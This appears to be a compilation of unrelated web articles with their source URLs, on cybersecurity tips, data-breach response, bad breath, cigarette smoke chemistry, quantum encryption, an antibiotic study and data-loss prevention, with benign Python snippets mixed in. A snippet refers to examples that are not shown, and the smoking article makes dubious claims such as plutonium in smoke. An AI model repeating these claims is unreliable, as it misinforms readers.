- Train employees on how to spot and avoid phishing attacks. Adopt a learning management system like CyberHoot to teach employees the skills they need to be more confident, productive, and secure.
- Test employees with phishing attacks to practice. CyberHoot's phish testing allows businesses to test employees with believable phishing attacks and put those that fail into remedial phish training.
- Deploy critical cybersecurity technology, including two-factor authentication on all critical accounts. Enable email spam filtering, validate backups, and deploy DNS protection, antivirus, and anti-malware on all your endpoints.
- In the modern work-from-home era, make sure you're managing personal devices connecting to your network by validating their security (patching, antivirus, DNS protections, etc.) or prohibiting their use entirely.
- If you haven't had a risk assessment by a third party in the last two years, you should have one now. Establishing a risk management framework in your organization is critical to addressing your most egregious risks with your finite time and money.
- Buy cyber-insurance to protect you in a catastrophic failure situation. Cyber-insurance is no different from car, fire, flood, or life insurance: it's there when you need it most.
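To make the "error messages" and "hard-coded credentials" examples above concrete, here is a small, hedged Python sketch; the names, messages, and commented-out leaky pattern are illustrative rather than taken from any real application:

```python
# Sketch: keep failure detail server-side and secrets out of source code.
import logging
import os
import uuid

log = logging.getLogger("app")

# Leaky pattern to avoid: a credential committed to source, plus an
# error response that names internal tables/columns for anyone probing:
#   DB_PASSWORD = "hunter2"
#   return f"SQL error on table users, column ssn: {exc}", 500

DB_PASSWORD = os.environ.get("DB_PASSWORD")  # injected, never committed

def handle_failure(exc: Exception) -> tuple[str, int]:
    """Log the full detail privately; give clients only an opaque ref."""
    ref = uuid.uuid4().hex[:8]
    log.error("incident %s: %r", ref, exc)  # stays in server logs
    return f"Something went wrong (ref {ref}).", 500
```

The opaque reference lets support staff find the detailed log entry without the response itself disclosing anything about the application's internals.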
All of these recommendations are built into the CyberHoot product or CyberHoot's vCISO services. With CyberHoot you can govern, train, assess, and test your employees. Visit CyberHoot.com and sign up for our services today. At the very least, continue to learn by enrolling in our monthly cybersecurity newsletters to stay on top of current cybersecurity updates.

CyberHoot also has other resources available for your use. Below are links to all of our resources; feel free to check them out whenever you like:

- Cybrary (Cyber Library)
- Press Releases
- Instructional Videos (HowTo) - very helpful for our SuperUsers!

Note: If you'd like to subscribe to our newsletter, visit any link above (besides infographics), enter your email address on the right-hand side of the page, and click 'Send Me Newsletters'.
https://cyberhoot.com/cybrary/information-disclosure/
In today's digital age, malicious actors are becoming bolder and wilier when it comes to stealing data. Simply putting safeguards in place isn't enough anymore; the chances that your private data could be exploited are rising, and you need to have plans in place in the event of a data breach.

What is a data breach?

A data breach is a cyber-attack that results in the release of sensitive data. It usually involves a malicious actor gaining access to a system and exploiting its vulnerabilities to extract private data. The malicious actors extract information from the system through phishing - the process of acquiring sensitive information through deceptive tactics, like sending email links from a seemingly trusted source - or by using malware such as keyloggers and spyware. However, a data breach can also occur through the accidental release of data, as when a company systems administrator uploads a file containing customers' social security numbers onto a public server rather than the secured, employees-only server.

Data breaches hurt companies, and some never recover. Once sensitive information is leaked to the public, they may lose customers or even be subjected to lawsuits. Other harm caused by data breaches includes:

- Reputational damage
- Identity fraud or theft
- Financial loss
- Lost employment or business opportunities
- Disruption of company services
- Spam emails
- Legal implications

One of the largest data breaches in Australian history was suffered by tech unicorn Canva in May 2019. The company's systems were breached, and up to 139 million users' details, including usernames, email addresses, and hashed passwords, were stolen. The intruder was stopped mid-attack, but the high-profile company suffered a harsh blow to its reputation.

Precautions to take in advance

Malicious data breaches result from cyber-attacks. Malicious actors gain unauthorised access to your data through methods like phishing, brute-force attacks, and malware. Knowing how these attacks work is the first step in being able to prevent them.

- Phishing: this deceptive attack is designed to fool the unwary. Malicious attackers pose as trusted individuals or organisations to coax you into handing over access to sensitive data, for example by sending an email with a link. Clicking on the link then gives the attacker access to your system.
- Brute force: less sophisticated but determined attackers might use software tools to work through your password possibilities. If your password is weak, it can take only seconds to crack (see the worked example below).
- Malware: the invasion of computer systems by harmful software, like spyware, ransomware, Trojans, or worms. Malware exploits the vulnerabilities in your system and can disable your antivirus software, spy on keystrokes for passwords, and encrypt data.

You should always be wary of potential data breaches. Every person who interacts with your system is a vulnerability and must be aware of the risks to data.
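To put the brute-force point in rough numbers, the sketch below computes worst-case search times for a few password shapes. The guesses-per-second figure is an assumed round number for an offline cracking rig, chosen purely for illustration:

```python
# Rough worst-case brute-force arithmetic. The guesses-per-second
# figure is an assumed round number, for illustration only.
GUESSES_PER_SEC = 1e10

def worst_case_days(length: int, alphabet_size: int) -> float:
    """Days to exhaust the full keyspace at the assumed guess rate."""
    return alphabet_size ** length / GUESSES_PER_SEC / 86400

for length, alphabet, label in [
    (8, 26, "8 chars, lowercase only"),
    (8, 94, "8 chars, full printable ASCII"),
    (14, 94, "14 chars, full printable ASCII"),
]:
    print(f"{label}: ~{worst_case_days(length, alphabet):.3g} days")
```

The exponential growth in the keyspace is why length and character variety, enforced through a password manager, matter far more than clever substitutions.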
Steps to avoid a data breach:

- Assess and analyse the level of risk
- Set security controls like firewalls, identity and access management, and security patch updates
- Install anti-virus software
- Establish a cybersecurity policy
- Use high-grade encryption for sensitive data
- Implement a password manager for all employees to use
- Enable multi-factor authentication
- Establish and test data breach response plans
- Patch and upgrade software as soon as updates are available
- Educate employees about social engineering attacks

Security is only as strong as its weakest link. By implementing strong cybersecurity protocols, you reduce the risk of becoming the victim of a data breach. However, no matter the strength of your preventative measures, assuming the worst will keep you ready in the case of a data breach incident.

Steps to take in the event of a data breach

Under the Notifiable Data Breaches (NDB) scheme, any organisation or agency covered by the Privacy Act 1988 must notify the affected individuals and the Office of the Australian Information Commissioner (OAIC) if a data breach is likely to cause serious harm to the individuals whose personal information was stolen or leaked.

On top of that, when a breach has occurred, it's vital that you already have an incident response plan you can immediately set in motion to reduce the risk and minimise the harm to affected individuals - not just yourself, but your customers. An incident response plan will enable you to respond quickly to a data breach notification and minimise the damage. The OAIC recommends four key steps:

- Contain the data breach to prevent any further compromise of information
- Assess the breach by gathering facts and evaluating the risks
- Notify the individuals involved, and the Commissioner if required
- Review the incident and consider what actions to take to prevent future breaches

Assemble a response team and ensure each individual is primed on their role and responsibilities in the event of a breach. Putting the team through their paces with a simulated breach test will cement their confidence and collaboration. An ideal response team will consist of:

- Team leader: leading the team and reporting to management
- Project manager: co-ordinating and supporting the team
- Key privacy officer: privacy expertise
- Legal support: identifying legal obligations
- Risk management support: assessing the risks
- Forensics support: establishing the cause and impact where ICT systems are involved
- HR support: if the breach was due to an employee's actions
- Media/communications support: liaising with affected individuals and handling media announcements

The size and scope of your business will determine which roles you need and which you are unable to fill; the three most important are legal, data forensics, and media management. Some team members may take on more than one role, or you may need to outsource for others. Having a second point of contact for each role will allow for any unexpected absences.

How to recover following the event

Say that, despite all your efforts to the contrary, a breach has occurred, and malicious actors gained unauthorised access to your personal information and private data. Fortunately, with your incident response plan in readiness and your response team well-prepped for the incident, you have minimised the damage as much as you can. The next phase is assessing the cause of the breach and taking steps to prevent it from happening again.
This could mean anything from staff training to changing your antivirus software or implementing greater cybersecurity precautions. Further, if you have been liaising with the media, it's important to allay public alarm to soften the damage your reputation has taken. Social media updates and public announcements can go far in reclaiming your customers' trust.

Stay one step ahead with the right team

The potential of data breaches is ominous, and the steps and plans you should implement before, during, and after an incident can be overwhelming. Consult the IT specialists at INTELLIWORX for a risk assessment, and start building your data breach prevention plans today.
https://intelliworx.co/au/blog/steps-to-successfully-manage-a-data-breach/
What Causes Bad Breath?

The causes of bad breath and how to eliminate it.

Many people have a problem with bad breath (halitosis), but they have no idea what causes it or how to eliminate it. In general, there are three possible reasons why a person might have bad breath:

1. Eating Smelly Foods

Aromatic foods such as onions, garlic, fish, peanut butter and others can leave a strong odor on your breath, but this type of bad breath is only temporary unless there are also other problems.

2. Poor Oral Hygiene

Properly brushing, flossing and using mouthwash is essential for keeping bad breath at bay. Maintaining good oral hygiene is also very important for preventing the third (and most serious) cause of bad breath...

3. A Dental Condition

Dental conditions such as gum disease, oral cancer, cavities, and/or bacteria on the surface of the tongue typically result in bad breath. Unfortunately, these conditions cannot be remedied without the help of a dentist.

In a nutshell, brushing (including the tongue), flossing and gargling with mouthwash after every meal, coupled with regular professional cleanings, will prevent the most pervasive causes of bad breath. Chewing gum helps reduce the intensity of bad breath by keeping the mouth moist, and many people also find relief by using toothpaste, mouthwashes and other oral hygiene products that are formulated specifically to combat persistent halitosis.
https://www.knowledgepublisher.com/article/258/what-causes-bad-breath.html
Chemical Components of Cigarette Smoke

Chemical Components in a Cigarette

If you are not aware of the components in a cigarette, the breakdown below should give any sensible person who is conscious of their own health, and the health of others, reason to stop smoking.

Nicotine

Nicotine is a powerful insecticide and a poison to the nervous system. There is enough of it (50 mg) in four cigarettes to kill a man in just a few minutes if it were injected directly into the bloodstream. Indeed, fatalities have occurred in children after they swallowed cigarettes or cigarette butts. When diluted in smoke, nicotine reaches the brain in just seven seconds; it stimulates the brain cells and then blocks the nervous impulse. This is where addiction to tobacco arises. Nicotine also accelerates the heart rate, but at the same time it contracts and hardens the arteries: the heart pumps more but receives less blood. The result is twice as many coronary attacks. Nicotine also increases the consumption of lipids (which is why it has a weight-loss effect) and induces temporary hyperglycemia (hence the appetite-suppressing effect).

Carbon monoxide (CO)

This is the asphyxiating gas produced by cars, which makes up 1.5% of exhaust fumes. Smokers inhaling cigarette smoke, however, breathe in 3.2% carbon monoxide - and directly from the source. Oxygen is mostly transported in blood by haemoglobin. When we smoke, carbon monoxide attaches itself to the haemoglobin 203 times more readily than oxygen does, thereby displacing the oxygen and asphyxiating the organism. This causes cardiovascular complaints - narrowing of the arteries, blood clots, arteritis, gangrene, heart attack, and so on - as well as a loss of reflexes and visual and mental problems. It takes between six and 24 hours for the carbon monoxide to leave the blood system.

Irritant substances

These substances paralyse and then destroy the cilia of the bronchial tubes, which are responsible for filtering and cleaning the lungs. They slow down respiratory output and irritate the mucous membranes, causing coughs, infections and chronic bronchitis.

Tars

As the cilia are blocked (see the paragraph above), the tars in cigarette smoke are deposited and collect on the walls of the respiratory tract and the lungs, causing them to turn black. So, just because a smoker is not coughing, it doesn't mean that he or she is healthy - a fact that undermines one of the most common and poorest excuses given by smokers. The carcinogenic action of the tars is well known: they are responsible for 95% of lung cancers. It takes at least two days after cessation of smoking for the cilia to start functioning properly again, and even then only gradually. By smoking one packet of cigarettes every day, a smoker pours a cupful of these tars (225 grams on average) into his or her lungs every year!

Chemistry of Tobacco Smoke

No less than 4,000 irritating, suffocating, dissolving, inflammable, toxic, poisonous, carcinogenic gases and substances, and even radioactive compounds (nickel, polonium, plutonium, etc.), have been identified in tobacco smoke.
Some of these are listed hereafter: benzopyrene, dibenzopyrene, benzene, isoprene, toluene (hydrocarbons); naphthylamine; nickel, polonium, plutonium, arsenic, cadmium (metallic constituents); carbon dioxide, methane, ammonia, nitric oxide, nitrogen dioxide, hydrogen sulphide (gases); methyl alcohol, ethanol, glycerol or glycerine, glycol (alcohols and esters); acetaldehyde, acrolein, acetone (aldehydes and ketones); hydrocyanic or prussic acid, carboxyl derivatives (acids); chrysene, pyrrolidine, nicotine, nicoteline, nornicotine, nitrosamines (alkaloids or bases); cresol (phenols); etc.
https://www.knowledgepublisher.com/article/393/chemical-components-of-cigarette-smoke.html
The rapid technological change of the last decade has transformed every corner of our lives, from how we communicate with friends to the skills needed to navigate and prosper in the current labour market. As Professor Ian Chubb, neuroscientist and former Chief Scientist of Australia, summed it up in 2013: "STEM is everywhere. Our nourishment, our safety, our homes and neighbours, our relationships with family and friends, our health, our jobs, our leisure are all profoundly shaped by technological innovation and the discoveries of science."

The scale and pace of these changes poses challenges for those at all stages of the education and career ladder. For mid-career professionals moving into roles managing ambitious graduates with a higher technological literacy than their own, the challenges are perhaps greater than for any other cohort. In line with that, there is great opportunity in both tech education and management training.

The base level of tech literacy is higher than ever

Recent and future graduates are reaping the benefits of a growing emphasis on STEM (science, technology, engineering and mathematics) across all levels of education, from primary through to postgraduate. Their skills and perspectives are shaped by a curriculum and learning methodology revolving heavily around inquiry, problem-solving and digital know-how. Rather than being just elements of the overarching curriculum, STEM is now central to the foundational knowledge taught in classrooms, from the early years onwards.

Graduates from all disciplines are entering the workforce with advanced STEM skills: they expect their leaders to be digitally fluent, globally oriented and knowledgeable about future directions in science and technological innovation. The managers who keep up to date with technological advancements, those unique to their industry as well as business productivity tools more generally, bring the best out of their teams by playing to the team's strengths.

Talented teams need knowledgeable leadership

A team of skilled technology professionals relies on informed management to make the most of their skills and translate their work into a marketable and valuable service. So what should the modern manager do to become fluent in the technologies shaping the global marketplace and the skillsets of their teams? What can they do to ensure their team is engaged and supported to achieve their collective best?

More than anything, they must make a conscious and proactive effort to keep up. It is no longer optional; managers have to be as technically literate as the teams they lead. A continued commitment to ongoing education, whether formal postgraduate study, attendance at relevant conferences, or simply staying up to date with industry publications, enables mid-career professionals to stay abreast of industry developments and opportunities at a managerial level.

Waiting for new trends to become widespread leaves you behind the pack

Today's managers need to be one step ahead of digital trends so they can make the most strategically discerning business and marketing decisions. There is no magic crystal ball, of course, but the best leaders out there have a mindset that is always future-focused. Considering the impact technology is having on industries unrelated to your own is a useful exercise, looking out for the opportunities that could translate to your business.
A leader who is dedicated to supporting a talented team needn't know every technological detail required to bring a project to life, but they should understand and appreciate the capability of their team. Project and stakeholder management are key skills very much in demand in the IT sector, as many businesses negotiate complex structural transformations to set themselves up for growth in the new, digitally shaped environment.

IT professionals need a well-rounded skillset

On the flip side, it's increasingly important for talented, technologically minded professionals to develop managerial skills. Whether you're preparing for career progression or pursuing entrepreneurial opportunities, having a strong set of soft skills to complement your tech talent is essential. More and more frequently, employers are looking for versatile people who can adapt to each new project's needs, and the person with a varied toolkit of skills is far more appealing than someone who is an expert in only one stream.

Using tech makes fitting education into your schedule easier

Advancements in tech obviously don't stop at business. There are numerous ways to introduce tech or tech-management education into your schedule. Massive open online courses (MOOCs) are a great tool for brushing up on fundamentals, offering free, self-paced access to courses from universities around the world (without gaining a formal qualification). However, if you're looking to advance your career, it's undeniable that a postgraduate qualification can be the key to unlocking many opportunities. Undertaking a Master of IT online provides formal technical and managerial education in a practical way, and can be completed in as little as two years part-time.

Southern Cross University is an established Australian public university, with campuses at Lismore and Coffs Harbour in northern New South Wales, and at the southern end of the Gold Coast in Queensland. SCU offers on-campus and online postgraduate courses in project management, accounting, business, education, engineering, healthcare, IT and law.
https://bdtechtalks.com/2017/07/11/the-importance-of-ongoing-tech-education-as-a-manager/
Quantum computers will open doors to otherwise impossible breakthroughs. At the same time, they might render our security defenses useless. Quantum computing is an existential threat, says Denis Mandich, CTO of Qrypt, a quantum-secure encryption provider.

Fully aware that quantum computers could easily break the protections we rely on today, the US government is racing to build a post-quantum encryption standard to protect against that threat. In theory, we could have cryptography resistant to quantum-computer attacks as early as the beginning of 2022. Yet in practice, we've witnessed two post-quantum algorithms breached using conventional computers, sending shock waves through the cryptographic community. "The fear right now is that these new algorithms we are transitioning to will break, and there's no proof that they are secure," Mandich said. He believes that quantum computers are becoming the virtual nuclear weapons of cyber warfare, so it is crucial to start quantum-encrypting your data today.

I sat down with Mandich to discuss the less exciting side of quantum computing: the disruption that it brings.

Baidu introduced its first quantum computer. IBM said it would build 4000-qubit commercial quantum computers by 2025. All the opportunities and excitement aside, can you elaborate on the threat and risks that the dawning era of quantum computing poses to our everyday life?

It's an existential threat to our digital lives and communications today. Believe it or not, we currently rely on just a handful of algorithms that run the entire internet, all banking transactions, and all our medical records. These were invented in the 1970s, and quantum computers break these systems. Unfortunately, they underpin all of the digital asset security we have today, for software applications, web browsers, and just about everything else you can think of.

Back in the early 2010s, the government realized this and began a process to phase these algorithms out and replace them with newer ones, called post-quantum cryptography. These will theoretically be safe against quantum computers. But we don't know, because there's no track record for them. Recently, one of the strongest ones, which was held in reserve - SIKE (Supersingular Isogeny Key Encapsulation) - was broken by a regular computer. We have no proof that the new algorithms we are transitioning to are secure; the fear is that one of them will break.

China, the US, and many other governments worldwide have been collecting data [store-now-decrypt-later], waiting for the day when they will be able to decrypt it and operationalize it. Everyone is very concerned that we might not be as safe as we thought we would be after converting to post-quantum crypto. Quantum is scaling much faster than we expected.

Maybe it's for the better that we learned now that a post-quantum cryptographic algorithm could be cracked? On the other hand, it was designed to resist a quantum threat but was broken using a conventional computer in an hour, so this must concern you, right?

It's shocking. It has shaken the entire cryptographic community, because the way it was broken was based on techniques and math discovered in the 1970s. We started with over 80 of them [post-quantum encryption algorithms] and are down to a handful. The problem here is that SIKE, although less performant than the other algorithms, was considered at least as strong, yet was broken so quickly.
What if that had happened and not been discovered for five or ten years? What about the other algorithms? They haven't been breached yet, but does that mean they are unhackable? Maybe it's just a matter of time and persistence.

Even the government has told us to be crypto agile [crypto-agility is the ability of a security system to switch between algorithms rapidly], which means: be prepared for them to fail. It could be tomorrow, it could be ten years from now, but the anticipation is that they will eventually break, and we will have to come up with stronger and stronger systems.

What does it mean for companies? If I were a company's CEO, I would probably be lost at the moment, with some experts urging me to prepare for the shift towards post-quantum cryptography while, simultaneously, some algorithms are being broken with conventional computers. What should companies do now - should they look into different algorithms or wait for the standard to be implemented?

Waiting would be a mistake, because we know for sure - it's publicly proven through Shor's algorithm and other means - that the algorithms we are using today are broken. They are not secure. Although we are not 100% sure about the ones we are transitioning to, they are way better, way stronger, and being crypto agile is a better position for all future application development. The older monolithic algorithms will be deprecated and will not be used in the future.

So the first step is getting your crypto inventory and figuring out what's on your system. Standardization could come in as little as 15 months, by January 2024. We are not that far out, so everyone should be trying proofs of concept and test implementations to see what kind of systems will break and what kind of software will have performance issues when we transition to post-quantum. Start doing all those things now, because if you are in a compliance-driven industry or in the US government, you have to transition to post-quantum. It is not optional; it is mandatory.

What if you are not the US government? What if you are just a private company sitting on intellectual property? You are not obliged to adopt those algorithms, and yet, at the same time, you could expose some data related to the US government, given that everything is interconnected.

The transition will be gradual, and small companies that are not required to comply with government standards will start doing it in probably six months or so. It makes no sense to engineer something into your system that is quantum-insecure. Virtually everyone going forward, certainly after 2024, will say they are post-quantum safe or something to that effect. In the same way you see a little lock for HTTPS in your browser, you will see HTTPQ, and if you don't, you won't click on those sites, because you will assume that your data is not safe. This is just a matter of time.

There's a significant cost for anyone who does not transition. If you are developing new software, with a roadmap of five years, you don't want to go back and re-engineer those systems to be post-quantum secure later. You want to build that in now and figure out what will work when you scale, especially if you plan to be successful as a company.

In terms of implementing any of these solutions, is it challenging to do? Can I choose one protocol now and then move to something else, maybe safer, a few years from now?

Yes. If you build in that crypto agility from the beginning, you should be able to swap that in and out.
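As a hedged sketch of what that kind of crypto agility can look like in application code, the minimal Python registry below lets the algorithm be chosen by name rather than hard-coded at every call site. The algorithm names and stub transforms are purely illustrative stand-ins, not real ciphers or post-quantum libraries:

```python
# Minimal crypto-agility pattern: callers name an algorithm; they
# never hard-code one. Transforms below are stubs, not real encryption.
from typing import Callable, Dict

REGISTRY: Dict[str, Callable[[bytes], bytes]] = {}

def register(name: str):
    def deco(fn):
        REGISTRY[name] = fn
        return fn
    return deco

@register("classic-placeholder")
def classic(data: bytes) -> bytes:
    return data[::-1]  # stand-in transform only

@register("pqc-placeholder")
def pqc(data: bytes) -> bytes:
    return bytes(b ^ 0x5A for b in data)  # stand-in transform only

def encrypt(data: bytes, algorithm: str = "classic-placeholder") -> bytes:
    # Deprecating a broken algorithm becomes a configuration change,
    # not a rewrite of every call site.
    return REGISTRY[algorithm](data)

print(encrypt(b"payload", algorithm="pqc-placeholder"))
```

The point of the pattern is exactly what the interview describes: when an algorithm such as SIKE falls, you retire its registry entry and move on.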
If you didn't, you made a huge mistake. This is part of the guidance NIST (National Institute of Standards and Technology) gave: you have to be crypto agile, because we – NIST – have no idea if these can break at any time. SIKE was a huge warning and a reminder for people that you have to be crypto agile.

What's your opinion on the store-now-decrypt-later trend? Are threat actors extracting vast amounts of data and waiting for quantum computers to arrive and decipher it for them? Is that a significant threat? Will we see a massive leakage of secrets once quantum computers come?

They are storing way more than people can believe. The cost of storing data is almost zero at this point. It costs nothing to store the data, and you are not running massive systems that need to be continuously accessed with computational resources. The profit margin for storing data is exceptionally high, and the cost is extremely low. You don't have to decrypt all that data; you have to be able to decrypt a few pieces of it. The US government did this for decades, for the entire Cold War – it was called the Venona project, and it was highly successful. This was one of the best techniques where you don't have physical access to someone's systems, but you have access to the signals coming out of a facility, over the internet, over the satellites. Collecting those is very easy. As we do everything over the internet, those pipes go through data centers worldwide, through different vendors, where they can be captured and stored.

The Chinese government's number one goal is to overtake the US economy, and they've been very successful at that. We've seen the largest transfer of wealth from one country to another, from the United States to China, through the [theft] of intellectual property. That is not going to change. That is how their system works. The US government can only collect secrets, not help any company get richer, but they can do that in China. They can collect secrets from US entities to make Huawei a bigger company. You can't do that in the United States – you can only steal secrets for strategic decisions of the government, not to enrich IBM.
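Mandich's point about crypto agility lends itself to a concrete illustration. The sketch below – a minimal example of the pattern, not anything Qrypt or NIST ships – tags every ciphertext with the name of the algorithm that produced it, so an application can later register a stronger (for example, post-quantum) implementation and still read old data. The class and tag names are invented for the example; the only real dependency is the widely used Python cryptography package (pip install cryptography).

```python
from cryptography.fernet import Fernet  # assumption: pip install cryptography

class FernetCipher:
    """Today's algorithm; a post-quantum implementation could register later."""
    name = b"fernet-v1"
    def __init__(self, key):
        self._f = Fernet(key)
    def encrypt(self, data: bytes) -> bytes:
        return self._f.encrypt(data)
    def decrypt(self, token: bytes) -> bytes:
        return self._f.decrypt(token)

REGISTRY = {}  # algorithm tag -> cipher instance

def register(cipher):
    REGISTRY[cipher.name] = cipher

def seal(data: bytes, preferred: bytes) -> bytes:
    cipher = REGISTRY[preferred]
    return cipher.name + b":" + cipher.encrypt(data)  # the tag travels with the data

def unseal(blob: bytes) -> bytes:
    tag, _, token = blob.partition(b":")
    return REGISTRY[tag].decrypt(token)  # old records stay readable after a swap

register(FernetCipher(Fernet.generate_key()))
blob = seal(b"customer record", b"fernet-v1")
print(unseal(blob))  # b'customer record'
```

Because every stored blob carries its algorithm tag, deprecating an algorithm is a matter of registering a new cipher and re-sealing data opportunistically, rather than a big-bang migration.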
Bacterial infections are the number one cause of death in hospital patients in the United States, and antibiotic-resistant bacteria are on the rise, causing tens of thousands of deaths every year. Understanding exactly how antibiotics work (or don't work) is crucial for developing alternative treatment strategies, not only to target new "superbugs," but also to make existing drugs more effective against their targets. Using synthetic biology techniques, a team of researchers at the Wyss Institute at Harvard University has discovered that bacteria respond to antibiotics very differently – exactly the opposite, in fact – inside the body versus on a Petri dish, suggesting that some of our current assumptions about antibiotics may be incorrect.

"The image most clinicians have is that antibiotics work by killing actively dividing bacteria, and non-dividing bacteria are the ones that resist treatment and cause infections to persist. I wanted to know whether that's actually true – does the proportion of dividing bacteria change over the course of an infection, and how do antibiotics impact that?" says Laura Certain, M.D., Ph.D., a Clinical Fellow at the Wyss Institute and the Massachusetts General Hospital who is the first author of the study. "Synthetic biology is widely used to engineer bacteria so that they produce useful products or diagnose diseases, and we used that same approach to create a microbiology tool that can tell us how bacteria are behaving in the body." The research is published in today's issue of Cell Host & Microbe.

Certain and her colleagues used a genetically engineered strain of E. coli bacteria that was created in the lab of Wyss founding Core Faculty member Pamela Silver, Ph.D., a few years ago. The bacteria have a genetic "toggle switch" encoded into their DNA that changes from the "off" to the "on" position when the bacteria are exposed to a chemical called anhydrotetracycline (ATC). When the switch is turned on, a genetic change happens in the bacteria that allows them to digest the sugar lactose, while bacteria whose switches remain off cannot. The key to this system is that the toggle switch can only be flipped if the bacteria are actively dividing when ATC is added; any non-dividing bacteria's switches will stay off, even when ATC is present. Thus, the toggle switch offers a snapshot in time that can indicate whether bacteria were active or dormant at the moment of ATC exposure.

Bacterial studies are often carried out in vitro, but infections happen in the complex environment of living bodies, which are quite different from a Petri dish. To evaluate their bacteria in vivo, the researchers implanted a small plastic rod into the legs of mice and inoculated their engineered bacterial strain into the leg to imitate the chronic bacterial infections that commonly arise in humans when medical devices and artificial joints are implanted. They then injected the mice with ATC at different times throughout the course of the infection to flip the toggle switch in any dividing bacterial cells to the "on" position. When they extracted bacteria from the mice and grew them on a special lactose-containing medium, they found that all the bacteria were actively dividing for the first 24 hours, but by the fourth day that fraction dropped to about half and remained constant for the rest of the infection, indicating that the number of bacteria being killed by the body was balanced by new bacteria being created via cell division.
This result differed from the in vitro response, in which all the bacteria stopped dividing once they reached the carrying capacity of their environment.

Next, the scientists tested the bacteria's response to antibiotics in vivo by allowing the infection to progress for two weeks, then injecting the mice with the antibiotic levofloxacin. When they analyzed the extracted bacteria, they found that while the total amount of bacteria in the mice decreased, the proportion of the surviving bacteria that were actively dividing actually increased. This outcome was in direct opposition to the behavior observed in vitro, where antibiotics killed more dividing cells than non-dividing cells. The researchers screened the bacterial colonies for antibiotic resistance and did not find any evidence that the bacteria had evolved to better withstand the killing effects of the levofloxacin, confirming that the antibiotic was still effective.

"There are several possible reasons why we saw a higher proportion of dividing bacteria in the presence of an antibiotic," says Certain. "We find it most likely that dormant cells are switching into an active state in order to 'fill the gaps' that arise when antibiotics reduce the overall bacterial population. If bacteria continue to actively divide throughout an infection, as our study suggests, they should be susceptible to antibiotics." Indeed, the researchers were able to cure the infection with a higher dose of the antibiotic, indicating that, contrary to conventional assumptions about bacterial infections, there is no fixed population of dormant, antibiotic-tolerant cells in this chronic infection model.

"If an antibiotic isn't working, we should focus on finding ways to deliver more of it to the infection site or identifying other tolerance mechanisms that might be at play, rather than assuming that a bastion of non-dividing bacteria is the culprit," says corresponding author and Wyss founding Core Faculty member Jim Collins, Ph.D., who is also the Termeer Professor of Medical Engineering & Science and a Professor of Biological Engineering at the Massachusetts Institute of Technology.

"This research shows the power of synthetic biology to provide new insights into mechanisms of cellular control, and emphasizes how we have to continually question the assumptions that guide clinical care today," says Wyss Institute Founding Director Donald Ingber, M.D., Ph.D., who also is the Judah Folkman Professor of Vascular Biology at Harvard Medical School and the Vascular Biology Program at Boston Children's Hospital, as well as Professor of Bioengineering at Harvard's John A. Paulson School of Engineering and Applied Sciences.

Additional authors of the paper include Jeffrey Way, Ph.D., Senior Staff Scientist at the Wyss Institute, and Matthew Pezone, a Research Assistant at the Wyss Institute. This study was supported by the Paul G. Allen Frontiers Group, the Defense Threat Reduction Agency, and the Wyss Institute at Harvard University.
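The "fill the gaps" hypothesis can be made concrete with a toy simulation. To be clear, this is our own illustration with arbitrary, made-up rates, not the study's model: each day the antibiotic kills a fraction of active cells, survivors divide, and some dormant cells reactivate. Even as the total population falls, the dividing fraction can rise, mirroring the in vivo observation.

```python
import random

def step(active, dormant, kill_p=0.4, divide_p=0.3, wake_p=0.2):
    """One day: the drug kills some active cells, survivors divide,
    and some dormant cells wake up to 'fill the gaps'."""
    survivors = sum(random.random() > kill_p for _ in range(active))
    newborn = sum(random.random() < divide_p for _ in range(survivors))
    woken = sum(random.random() < wake_p for _ in range(dormant))
    return survivors + newborn + woken, dormant - woken

active, dormant = 500, 500
for day in range(1, 11):
    active, dormant = step(active, dormant)
    total = active + dormant
    if total == 0:
        print(f"day {day}: infection cleared")
        break
    print(f"day {day}: total={total}, dividing fraction={active / total:.2f}")
```

With these parameters the total count shrinks day by day while the dividing fraction climbs well above its starting value of 0.5 — the same qualitative pattern the toggle-switch experiment revealed in mice.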
Losing data from your computer is a sheer nightmare, as it often means losing things that are dear to us. Do yourself a favor and take a little advice from this article on how to help prevent data loss.

Keep your system up to date
1) This may involve buying an upgrade every now and again, but that is not all you can do. For example, when Windows downloads updates, run them. Don't leave them kicking around for six months.

Install antivirus software
2) You need this for more reasons than you know. The Internet is full of auto-download stuff and clickable attack stuff. Antivirus software will protect you from most known threats (malware, worms, etc.). You also need a security program that pre-empts the virus downloading or setting up shop on your computer.

Use System Restore
3) It all seems like wasted computer space, all up until the point where you actually need it — then it is a godsend. It could just be that you installed a program that simply will not un-install correctly. Use System Restore to get back to the point before you downloaded or installed the program.

Backup your files
4) This is a no-brainer. For example, if you keep your college files on your hard drive, then back them up as hard copies on discs. If you have lots of accountancy documentation, then make hard copies, or store the backup information on a removable hard drive. (A minimal backup script is sketched at the end of this article.)

Protect against power surges
5) The easiest way to prevent power surge damage: do not plug your computer into the wall socket. Plug a surge-protected power strip into the wall and then plug your computer, printer, monitor, etc., into the strip.

Protect your computer from physical harm
6) This means protecting it from extended periods in the sun, from excessive moisture, from dust, dirt, knocks, or scrapes.

Create strong passwords
7) Keep hand-written notes of your passwords, but do not store them on anything electronic.

De-frag your computer
8) Computers are advanced enough that you won't have to defragment every week like we used to. Many computers still function quite well when they are fragmented, but that does not mean you should not maintain your computer.

Consider human threats from within
9) You may lose data thanks to your kids playing with your laptop. You may lose data from one of your malcontent staff removing information via a flash drive. You may also have a sneaky and suspicious partner who monitors and purges your files of things that he/she does not approve of. Do not overlook your internal threats.

Make it hard for hackers and be wary with emails
10) Making it hard for hackers involves longer and stronger passwords. It also means keeping your files and systems up to date. Keep yourself informed on the current hacker trends. This is especially true of email matters. Some phishing or malware emails look very inviting and legitimate. Be suspicious at all times and always make backup plans in case your next email contains the virus to end all viruses.

Author bio: Korah Morrison, writer on college-paper.org that helps students achieve their academic goals.
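For tip 4, a backup doesn't have to be elaborate to be useful. Here is a minimal sketch — our illustration, using only the Python standard library — that zips a folder into a timestamped archive, ideally on a removable drive that you disconnect afterwards. The paths are hypothetical and the destination folder is assumed to exist.

```python
import shutil
import time
from pathlib import Path

def backup(source: str, dest_root: str) -> Path:
    """Zip a folder into a timestamped archive, ideally on a removable drive."""
    stamp = time.strftime("%Y%m%d-%H%M%S")
    base = Path(dest_root) / f"backup-{stamp}"
    # shutil.make_archive appends the .zip suffix and returns the final path
    return Path(shutil.make_archive(str(base), "zip", root_dir=source))

if __name__ == "__main__":
    # Hypothetical paths: a documents folder and a plugged-in external drive
    print(backup("C:/Users/me/Documents", "E:/backups"))
```

Scheduling this with Task Scheduler or cron turns a chore into a habit; the timestamped names mean older archives are never overwritten.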
